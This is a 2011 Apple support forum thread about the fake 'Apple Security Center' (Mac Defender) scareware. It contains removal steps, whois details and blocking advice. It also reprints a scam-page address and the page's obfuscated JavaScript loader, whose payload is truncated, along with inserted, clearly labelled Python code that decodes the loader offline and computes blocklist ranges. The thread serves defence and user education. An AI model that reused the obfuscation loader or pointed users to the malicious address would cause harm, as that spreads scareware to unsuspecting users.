158 Replies. Latest reply: May 30, 2011 7:32 PM by babowa
  • AnsonX10 Level 1 (0 points)

    I just got this again. Second time this week (meaning past two days.)

     

    This time at http://178.17.163.163/45960a995d92e7f8bd64692123a83ed3fc65e7a568b08303


    I didn't copy the IP the first time.

     

    So "178.17.163.163" if you don't have it already. I see you already had "178.17.162.0/24" and "178.17.162.163"... very similar. I don't know exactly how IPs count up per computer and such, so I'm posting it anyway. lol

  • R C-R Level 6 (15,075 points)

    FWIW, a whois.ripe.net query on 178.17.163.163 shows that the IP range 178.17.160.0 - 178.17.175.255 is registered to I.C.S. Trabia-Network S.R.L., a web hosting company based in the Republic of Moldova.

     

    A portion of the response to that query:

     

    address:        I.C.S. Trabia-Network S.R.L.
    address:        str. V. Pircalab 52
    address:        2012 Chisinau
    address:        Republic of Moldova
    phone:          +373 (22) 844-844
    fax-no:         +373 (22) 844-509
    abuse-mailbox:  abuse@trabia.net
    remarks:
    remarks:        ++++++++++++++++++++++++++++++++++++++++++++++++++++
    remarks:        |           I.C.S. Trabia-Network S.R.L.           |
    remarks:        |                 Abuse Department                 |
    remarks:        ++++++++++++++++++++++++++++++++++++++++++++++++++++
    remarks:        |                                                  |
    remarks:        | This inet(6)num object is protected by our abuse |
    remarks:        | department. Our IRT (Incident Response Team) is  |
    remarks:        | reachable 24 hours a day.                        |
    remarks:        |                                                  |
    remarks:        | If you observe any abusive usage of an IP within |
    remarks:        | this inet(6)num range, contact us please in the  |
    remarks:        | following ways:                                  |
    remarks:        |                                                  |
    remarks:        | Phone:  +373 (22) 844-844                        |
    remarks:        | Fax:    +373 (22) 844-509                        |
    remarks:        | E-Mail: abuse@trabia.net                         |
    remarks:        |                                                  |
    remarks:        | In case you need a direct response, please feel  |
    remarks:        | free to call us 24/7 a day at +373 (22) 844-844. |
    remarks:        | E-Mail/Fax is getting monitored regularly by our |
    remarks:        | staff and being answered within 1 business day.  |
    remarks:        |                                                  |
    remarks:        ++++++++++++++++++++++++++++++++++++++++++++++++++++

  • R C-R Level 6 (15,075 points)

    MadMacs0 wrote:

    Neither you nor I represent the average user, and our behavior is not necessarily going to be emulated by everybody, so for all the folks that haven't learned that they cannot blindly click buttons because it's the only one available, I feel inclined to protect them against themselves.

    I think that in practical terms it is not possible to protect users from themselves. Education is the only real defense against trojans & other social engineering exploits.

  • Ollie Green Level 1 (0 points)

    I have recently bought a MacBook Pro 15 inch laptop. I seemed to have viruses and loads of popups coming up. I downloaded a security system for $50 named Mac Security version 2.6. It scans every day to see if I have viruses and trojans but says I am clear; however, the popups still come up and my computer is running slow.

    I am not sure how to set up the security side of my computer and don't know how to remove the viruses and trojans. I had a popup on Safari saying I had 65 viruses and trojans from 178.something but my security programme said it was fine.

    Any advice? Would appreciate any help.

    Thanks

  • WZZZ Level 6 (12,660 points)

    You have fallen for a total scam. Get this garbage off your computer immediately.

     

    First, restart in Safe Boot by holding the Shift key down at the chime. Or, alternatively, open Activity Monitor in Utilities, set to Active Processes, find the program and force quit it. This will keep it from running, but only temporarily, so you can remove it.

     

        1.    Drag the MacSecurity program -- or whatever it's called; it keeps using different names -- MAC Defender, MacProtector, MacKeeper 911, Apple Security Center, Apple Web Security -- it's not hard to imagine the new names it will be using in the coming days -- (installed in the Applications folder by default) to the Trash. Empty the Trash.

        2.    Remove item of same name from the Login Items for your Account in the OS X System Preferences (if it exists).

        3.    Go to your Home folder Library>Preferences and, if you find it, delete com.alppe.spav.plist. Look also in Application Support (may not be anything there, but check just in case) and search for any files with one of the above names and trash them. Empty the trash.

        4.    If you use Safari, go to Preferences>General and UNCHECK "Open "safe" files after downloading". Keep that unchecked.

     

    If you paid for it, they have your credit card #. Call your credit card and dispute the charges. Also, cancel the card ASAP.

     

    As a precaution, change your password.

  • AnsonX10 Level 1 (0 points)

    That website is most likely the website this discussion is about. It will automatically download a program to your computer, but you need to install it for it to do any damage.

     

    If a web browser tells you that your computer has viruses, don't believe it. How can a website know anything about your computer? I'll admit the website is designed to look official, and not like a website. But if you can close Safari or the Safari window, then it is a website and not an official alert.

     

    The only time you should trust a virus alert (on a Mac at least) is when you're sure it's your trusted anti-virus software that you've installed. Although your anti-virus software could be scam/trojan in itself.

     

    I can't explain why your computer is running slow though. More details about what is running slow would be helpful.

     

    I talk as if I can find solutions to everyone's problems. lol

  • Allan Eckert Level 8 (46,520 points)

    You don't have any virus on a Mac. Your AV software is not lying to you; just believe it.

    Why would you believe a piece of scamware on the web that claims you have a virus but not the AV software on your Mac? Think about it for a moment: the junk on the web is not capable of determining anything is on your Mac but the AV software is. So which are you going to believe now?

    If you will simply forget about virus problems and start looking at your Mac with tools like Activity Monitor to see what is slowing it down, you will make a lot more headway than you are now.

     

    Allan

     

     

     

    tiger

  • AnsonX10 Level 1 (0 points)

    If they paid you to buy it, then you wouldn't really be BUYing it. lol

     

    Ollie still should remove any files the popup downloaded.

  • arumdevil Level 1 (0 points)

    I've seen this page a few times in the last week or so. They have the look reasonably close, but really they could have done better, I think.

    Anyway, I managed to view the source code by first disabling JavaScript and then reloading the page and then viewing the source. There's a whole load of JavaScript (in which I am not proficient enough to make sense of it). Here is the code if anyone's interested:

     

     

     

    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" > <script type="text/javascript">if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var B1e16=window;var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};function X7r(){this.S1lf=[]}try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var ct=new Date();X7r.prototype.i1s1x=function i1s1x(string){this.S1lf.push(string);return this};if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var ct=new Date();X7r.prototype.toString=function toString(){return this.S1lf.join("")};try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}var u2ms={V1521:function(M2aq,t65,e1y2n){var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var jwt=document;var I142o=[];var b1f11=new X7r();var l2u10=new X7r();var V2s2h='';var V2s2h='';for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}for(var t14l=0;t14l<M2aq.length;t14l+=7)I142o.push(M2aq.substr(t14l,7));var jwt=document;for(var xn11=0;xn11<I142o.length;xn11++){if(I142o[xn11]=='')I142o.splice(xn11,1);for(var xn11=0;xn11<I142o.length;xn11++){var resultmod=this.D20n(parseInt(I142o[xn11],16),t65,e1y2n)+'';b1f11.i1s1x(resultmod.substr(1,resultmod.length-2))}}var V2s2h='';b1f11=b1f11.toString();for(var xn11=0;xn11<b1f11.length;xn11+=2){l2u10.i1s1x(String.fromCharCode(parseInt(b1f11.substr(xn11,2),10)+30))}var B1e16=window;return y292s.Z81y(l2u10.toString())},te1o:function(zi27,b2d2p){if(1==0){function 
t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var ct=new Date();var ct=new Date();return zi27-(b2d2p*Math.floor(zi27/b2d2p))},D20n:function(v1x2f,b2th,M1im){var jwt=document;try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var q1ox=1,t14l=0,x2112=v1x2f;for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}var jwt=document;while((b2th>>t14l)>0){if(((b2th>>t14l)&1)==1)q1ox=this.te1o((q1ox*x2112),M1im);x2112=this.te1o((x2112*x2112),M1im);t14l++}return q1ox}};var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var y292s={Z81y:function(k2210){var ct=new Date();var V2s2h='';var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var v261e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";if(1==0){function t(a){google.srp.updateLinksWithParam('tbo',a?'1':'',google.srp.isSerpLink,google.srp.isSerpForm)}}var V2s2h='';var C2gj,u1r21,j1s2i,v2813,b1o20,o101e,a1a1k,N2i2b,t14l=0;var W1tb=new X7r();var B1e16=window;for(var t14l=0;t14l<0;t14l++){var V2s2h='';var jwt=document;var B1e16=window}try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}do{v2813=v261e.indexOf(k2210.charAt(t14l++));b1o20=v261e.indexOf(k2210.charAt(t14l++));o101e=v261e.indexOf(k2210.charAt(t14l++));a1a1k=v261e.indexOf(k2210.charAt(t14l++));N2i2b=v2813<<18|b1o20<<12|o101e<<6|a1a1k;C2gj=N2i2b>>16&0xff;u1r21=N2i2b>>8&0xff;j1s2i=N2i2b&0xff;if(o101e==64)W1tb.i1s1x(String.fromCharCode(C2gj));else if(a1a1k==64)W1tb.i1s1x(String.fromCharCode(C2gj,u1r21));else W1tb.i1s1x(String.fromCharCode(C2gj,u1r21,j1s2i))}while(t14l<k2210.length);var V2s2h='';var B1e16=window;return this.s1f15(W1tb.toString())},s1f15:function(Jx27){var jwt=document;var jc=function(a,b,c,d,e){v.bo=f;b=d+b;c=',#searchform';d='';if(!e){b=Math.max(b,70);c=''}};var 
V2s2h='';var Mv1j=new X7r();var B1e16=window;try{if(5050==(new Date())){var y=71*3}}catch(error){processEror(error)}var t14l=0;var V2s2h='';var jwt=document;var M2aq=u8q=dr2e=0;while(t14l<Jx27.length){M2aq=Jx27.charCodeAt(t14l);if(M2aq<128){Mv1j.i1s1x(String.fromCharCode(M2aq));t14l++}else if((M2aq>191)&&(M2aq<224)){u8q=Jx27.charCodeAt(t14l+1);Mv1j.i1s1x(String.fromCharCode(((M2aq&31)<<6)|(u8q&63)));t14l+=2}else{u8q=Jx27.charCodeAt(t14l+1);dr2e=Jx27.charCodeAt(t14l+2);Mv1j.i1s1x(String.fromCharCode(((M2aq&15)<<12)|((u8q&63)<<6)|(dr2e&63)));t14l+=3}}return Mv1j.toString()}};function Tt1b(Pj1k,h272g){var L221u='';var F2h2f=0;var t14l=0;Pj1k=y292s.Z81y(Pj1k);do{L221u+=String.fromCharCode(Pj1k.charCodeAt(t14l++)^h272g.charCodeAt(F2h2f++));if(F2h2f>=h272g.length)F2h2f=0}while(t14l<Pj1k.length);return L221u}document.write(Tt1b('fTBF
    
    
    (lots of crap here taken out )
    
    
    Nxg=','AC&GYrEotoj7~7g6R&qi72VdSB'));</script> </head> <body> </body> </html>
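
Added example, not part of the original post: the visible end of the posted script calls `Tt1b(payload, key)`, which Base64-decodes the payload, UTF-8-decodes it, and XORs it with a repeating key before `document.write` renders the result. The Python below repeats those steps offline so the hidden markup can be read as inert text and its hosts listed for an abuse report; the sample payload and the `192.0.2.10` address are constructed, and all function names are hypothetical.

```python
import base64
import re
from itertools import cycle

# Key string copied from the second argument of the Tt1b(...) call in the post.
PAGE_KEY = "AC&GYrEotoj7~7g6R&qi72VdSB"


def xor_cycle(text, key):
    """XOR every character with the key, repeating the key as needed."""
    return "".join(chr(ord(c) ^ ord(k)) for c, k in zip(text, cycle(key)))


def decode_tt1b(payload_b64, key):
    """Static equivalent of Tt1b(): Base64 -> UTF-8 -> repeating-key XOR.

    Nothing is evaluated or written to a DOM; the return value is plain text.
    """
    raw = base64.b64decode(payload_b64)
    return xor_cycle(raw.decode("utf-8"), key)


def build_sample(markup, key):
    """Inverse transform, used only to build the constructed sample below."""
    return base64.b64encode(xor_cycle(markup, key).encode("utf-8")).decode("ascii")


def extract_hosts(markup):
    """Hosts of every http(s) URL in decoded markup, de-duplicated and sorted."""
    return sorted(set(re.findall(r"https?://([^/\s\"'<>]+)", markup)))


# Constructed sample: harmless markup using an RFC 5737 documentation address.
SAMPLE_MARKUP = (
    '<html><meta http-equiv="refresh" content="0;url=http://192.0.2.10/scan">'
    '<img src="http://192.0.2.10/img/alert.png"></html>'
)
SAMPLE_PAYLOAD = build_sample(SAMPLE_MARKUP, PAGE_KEY)

if __name__ == "__main__":
    decoded = decode_tt1b(SAMPLE_PAYLOAD, PAGE_KEY)
    print(decoded)
    print(extract_hosts(decoded))
```

The payload in the post was cut by its author, so only the structure of the call can be reproduced here; the `u2ms` helper defined earlier in the script is not used by the visible `document.write` call and is not modelled.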
    
    
  • AnsonX10 Level 1 (0 points)

    AHA! Everything makes sense now! Not really. Hopefully someone can pull something helpful out of it though.

     

    Someone? Anyone?

     

    I don't know what the page's source could hold that would help eliminate this threat, but we all want the site taken down.

     

    Edit: I think the title of this thread should be renamed to "Is "Apple Security Center" safe? Answer: NO!"

     

    Just to clear up any confusion.

     

    Message was edited by: AnsonX10

  • MadMacs0 Level 5 (4,500 points)

    R C-R wrote:

    > Education is the only real defense against trojans & other social engineering exploits.

     

    Agree completely.  That's why many of us are here.

  • ds store Level 7 (30,315 points)

    AnsonX10 wrote:

     

    I just got this again. Second time this week (meaning past two days.)

     

    This time at <soon to be deleted by host>


    I didn't copy the IP the first time.

     

    So "178.17.163.163" if you don't have it already. I see you already had "178.17.162.0/24" and "178.17.162.163"... very similar. I don't know exactly how IPs count up per computer and such, so I'm posting it anyway. lol

     

    AnsonX10

     

    Don't copy the whole url and paste it here, it creates a link where unsuspecting people can click and get the malware.

     

    If you see an IP address (178.17.163.163) or a domain name (like www.facebook DOT com), just post that part like so.

     

    Also, take and post a screen shot using Command Shift 4, then use the camera option in the Apple Support to upload the image.

     

    You can take 178.17.163.163 and remove the last number and sub "0/24" for 178.17.163.0/24 to block the subnet range in NoobProof black list preferences.

     

    NoobProof Instructions seem to be a little outdated and incomplete on how to block larger ranges such as 178.17.160.0 - 178.17.175.255

  • R C-R Level 6 (15,075 points)

    ds store wrote:

    NoobProof Instructions seem to be a little outdated and incomplete on how to block larger ranges such as 178.17.160.0 - 178.17.175.255

    Note that blocking that entire range of IP addresses would block everything from all of I.C.S. Trabia-Network S.R.L.'s clients. It is a web hosting service company, so a lot of "innocent" sites might be blocked as well.

     

    It might be more effective to email the company using its abuse address & let them know which of its IP addresses are being used for fraudulent purposes, or to report those IP's to one of the major ISP's like Comcast, which could get them blocked by putting them on the blacklists the ISP's maintain.
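
Added example, not part of the original posts: the "replace the last number with 0/24" rule and the whois range discussed above, worked through with Python's standard `ipaddress` module to show what each blocklist entry covers and how much of the hosting company's space it takes with it. The addresses are the ones quoted in the thread; the function names are hypothetical.

```python
import ipaddress

# Addresses and ranges quoted in the thread.
REPORTED = ["178.17.162.163", "178.17.163.163"]
ALREADY_BLOCKED = "178.17.162.0/24"
WHOIS_FIRST, WHOIS_LAST = "178.17.160.0", "178.17.175.255"


def slash24_for(ip):
    """The 'drop the last number, append 0/24' rule: the /24 containing ip."""
    return ipaddress.ip_network(f"{ip}/24", strict=False)


def range_to_cidrs(first, last):
    """Smallest list of CIDR blocks covering an inclusive first-last range."""
    return list(ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)))


def blocklist_report():
    """Compare blocking the whole whois range with blocking only observed /24s."""
    hoster = range_to_cidrs(WHOIS_FIRST, WHOIS_LAST)
    # Adjacent /24s merge into a single shorter prefix where alignment allows.
    narrow = list(ipaddress.collapse_addresses({slash24_for(ip) for ip in REPORTED}))
    existing = ipaddress.ip_network(ALREADY_BLOCKED)
    return {
        "hoster_cidrs": [str(n) for n in hoster],
        "hoster_addresses": sum(n.num_addresses for n in hoster),
        "narrow_cidrs": [str(n) for n in narrow],
        "narrow_addresses": sum(n.num_addresses for n in narrow),
        "missed_by_existing_rule": [
            ip for ip in REPORTED if ipaddress.ip_address(ip) not in existing],
    }


if __name__ == "__main__":
    for name, value in blocklist_report().items():
        print(f"{name}: {value}")
```

The existing 178.17.162.0/24 rule does not cover 178.17.163.163, because a /24 fixes the first three numbers; the two observed /24s merge into one /23 of 512 addresses, while the full whois range is a single /20 of 4,096 addresses.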

  • AnsonX10 Level 1 (0 points)

    I know how to take screen shots...

     

    I checked and saw that the URL was no longer active. That's why I felt safe enough to post the whole url.

  • ds store Level 7 (30,315 points)

    R C-R wrote:

     

    Note that blocking that entire range of IP addresses would block everything from all of I.C.S. Trabia-Network S.R.L.'s clients. It is a web hosting service company, so a lot of "innocent" sites might be blocked as well.

     

    Yes, I know. Bad apple ruins the whole bunch.

     

     

    R C-R wrote:

     

    It might be more effective to email the company using its abuse address & let them know which of its IP addresses are being used for fraudulent purposes, or to report those IP's to one of the major ISP's like Comcast, which could get them blocked by putting them on the blacklists the ISP's maintain.

     

    You use the carrot, I'll use the stick.
